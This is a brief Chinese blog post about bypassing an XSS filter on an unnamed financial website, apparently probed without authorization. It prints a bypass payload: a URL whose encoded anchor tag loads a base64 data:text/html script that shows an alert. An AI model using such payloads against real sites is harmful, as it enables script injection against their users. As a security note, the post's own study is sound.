XSS Filter绕过 - 润新知

XSS Filter绕过
之前挖到某金融网站的xss

但是困于xss filter无奈不好下手。只能在火狐下弹窗。

以下该图是我的测试。

后来发给一个Invoker哥们儿。成功给我发来payload成功绕过了XSS Filter
http://www.xxx.com/news.asp?lx=7&page=1%3Ca%20href=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdGZvcmZ1biEnKTwvc2NyaXB0Pg==%22%3Eclick%3Ca%3E
Code
得研究此绕过之法。

THE END
相关阅读:
mybatis_7分页查询
 mybatis_6日志工厂
 mybatis_5解决属性名和字段名不一致的问题(resultMap)
mybatis_4配置解析
 mybatis_3CRUD操作
 ARM C函数调用堆栈入栈顺序
 syscall SYSCALL_DEFINE*()实现
 ko kallsyms
elf文件结构解析
 ko module加载flow
原文地址：https://www.cnblogs.com/xishaonian/p/6118928.html